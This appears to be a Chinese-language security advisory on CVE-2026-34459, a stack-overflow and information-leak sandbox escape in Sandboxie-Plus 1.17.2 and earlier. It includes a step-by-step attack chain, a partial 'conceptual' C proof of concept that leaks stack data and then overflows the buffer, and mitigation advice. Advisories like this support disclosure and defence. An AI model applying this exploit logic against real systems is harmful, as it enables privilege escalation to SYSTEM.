CVE-2026-34459 Sandboxie-Plus 沙箱逃逸漏洞

漏洞信息

漏洞编号

CVE-2026-34459

漏洞类型

栈缓冲区溢出与信息泄露

CVSS评分

8.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sandboxie-Plus

漏洞概述

Sandboxie-Plus 1.17.2 及更早版本存在严重的沙箱逃逸漏洞。攻击者可利用 `SbieSvc` 代理服务的处理缺陷，通过发送特制 IPC 请求触发未初始化内存泄露与栈缓冲区溢出。利用泄露的地址信息绕过 ASLR 和 /GS 保护后，攻击者可构造 ROP 链，在沙箱内成功实现 SYSTEM 权限提升。

技术细节

该漏洞主要影响 Sandboxie-Plus 的核心隔离服务 `SbieSvc`。攻击者利用 `GetRawInputDeviceInfoSlave` 处理程序的逻辑缺陷进行沙箱逃逸。第一步是信息泄露，通过发送特定参数的 IPC 请求，导致服务端返回未初始化的栈内存数据，其中包含的关键地址信息可用于绕过地址空间布局随机化（ASLR）和栈溢出保护（/GS）。第二步是利用栈缓冲区溢出，由于未对输入长度进行严格校验，攻击者可控制 `memcpy` 的长度覆盖栈上的返回地址。结合泄露的信息，攻击者可精心构造面向返回编程（ROP）链，最终在沙箱进程上下文中执行任意代码并提升至 SYSTEM 权限。尽管硬件强制影子栈（Intel CET）能阻止 ROP 链的执行，但信息泄露风险依然存在。

攻击链分析

STEP 1

1. 信息侦测

攻击者定位沙箱内的 SbieSvc 代理服务及其 GetRawInputDeviceInfoSlave 处理接口。

STEP 2

2. 触发内存泄露

发送 cbSize 设置为 0 的 IPC 请求，导致服务返回最多 32KB 未初始化的栈内存。

STEP 3

3. 绕过安全保护

分析泄露的内存数据，提取返回地址（绕过 ASLR）和栈 Cookie（绕过 /GS 保护）。

STEP 4

4. 缓冲区溢出

发送带有恶意长度参数的 IPC 请求，利用 memcpy 未校验长度的漏洞触发栈缓冲区溢出。

STEP 5

5. 权限提升

利用泄露的 Cookie 伪造栈帧，并使用泄露的地址构造 ROP 链覆盖返回地址，执行任意代码获取 SYSTEM 权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for CVE-2026-34459
// This demonstrates the logic to trigger the leak and overflow.

#include <windows.h>
#include <stdio.h>

// Simulated IPC interaction structure
typedef struct _IPC_REQUEST {
    ULONG cbSize;
    PVOID buffer;
} IPC_REQUEST, *PIPC_REQUEST;

void SimulateExploit() {
    HANDLE hDevice = CreateFileA("\\\\.\\SbieSvcPort", ...);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to communicate with SbieSvc\n");
        return;
    }

    BYTE leakedData[0x8000];
    DWORD bytesReturned;

    // Step 1: Trigger Information Leak
    // Setting cbSize to 0 triggers the uninitialized memory return
    IPC_REQUEST leakReq;
    leakReq.cbSize = 0;
    leakReq.buffer = leakedData;

    // Send malicious request to leak stack cookies and addresses
    DeviceIoControl(hDevice, IOCTL_GET_RAW_INPUT_INFO, &leakReq, sizeof(leakReq), leakedData, sizeof(leakedData), &bytesReturned, NULL);

    printf("[+] Leaked %d bytes from kernel/service stack\n", bytesReturned);
    // Parse leakedData to find Stack Cookie and Return Address to bypass ASLR/GS

    // Step 2: Trigger Stack Buffer Overflow
    // Use the leaked info to craft a ROP chain
    BYTE exploitBuffer[0x8000];
    memset(exploitBuffer, 0x41, sizeof(exploitBuffer)); // Padding
    
    // Overwrite Stack Cookie (if not using CET)
    // memcpy(exploitBuffer + offset, &leakedCookie, sizeof(void*));
    
    // Overwrite Return Address with ROP gadget
    // memcpy(exploitBuffer + retOffset, &ropChainAddress, sizeof(void*));

    IPC_REQUEST overflowReq;
    overflowReq.cbSize = 0xFFFFFFFF; // Attacker-controlled length causing overflow
    overflowReq.buffer = exploitBuffer;

    // Send overflow request
    DeviceIoControl(hDevice, IOCTL_GET_RAW_INPUT_INFO, &overflowReq, sizeof(overflowReq), NULL, 0, NULL, NULL);

    printf("[+] Exploit sent. Attempting privilege escalation...\n");
    CloseHandle(hDevice);
}

影响范围

Sandboxie-Plus <= 1.17.2

防御指南

临时缓解措施

如果无法立即升级，建议启用系统的硬件强制影子栈（Intel CET）功能，这可以有效阻止 ROP 链的执行，从而降低权限提升的风险，但无法完全修复信息泄露问题。